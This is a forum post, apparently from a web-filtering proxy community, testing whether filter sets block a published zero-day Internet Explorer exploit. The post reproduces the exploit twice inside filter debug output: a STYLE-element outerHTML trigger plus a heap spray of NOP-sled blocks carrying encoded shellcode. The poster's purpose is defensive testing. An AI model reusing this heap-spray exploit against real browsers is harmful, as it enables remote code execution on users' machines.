Zero-Day Internet Explorer Exploit Published

[ProxoDent]

I saved the code you posted as an *.html page and ran it on one of my Apache servers.

My anti-virus effectively stops it (while trying to save the code to an html page and when loading the page in a browser), but the latest Sidki out-of-the-box does not block it.

I tried enabling a few non-default web filters to see if they would stop it, but the only one that I found effective was the Header Filter, "! |||||||||||| 7.1 Block all Scripts 07.03.20 [sd] (o.3) (Out)".

Here's an excerpt of the debug output with stock settings using the latest beta:

Code:

<script>
function load(){
var e;
e=document
<Match: Block/Modify: Sel. JS Properties     07.04.02 [sd] (d.2) >
.getElementsByTagName("STYLE")[0
</Match>
.getElementsByTagName("STYLE")[0+1];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>

And here's the same excerpt with the aforementioned Header Filter activated:

Code:

<Match: <script> Block: All Scripts     08.11.18 (cch!) [srl] (d.0) >
<script>
</Match>
<script type=text/javascript src=data:text/javascript,var%20prxCountAd=++prxCountAd||1;>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>


<Match: <script> Block: All Scripts     08.11.18 (cch!) [srl] (d.0) >
<SCRIPT language="javascript">
</Match>
<script type="text/javascript" src="data:text/javascript,var%20prxCountAd=++prxCountAd||1;">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>


<Match: Header Bot Mark: Start - Fix </head>     09.06.29 (multi) [sd] (d.r) >
</HEAD>
</Match>

This was a quick-and-dirty test, so my analysis is subject to being ripped apart.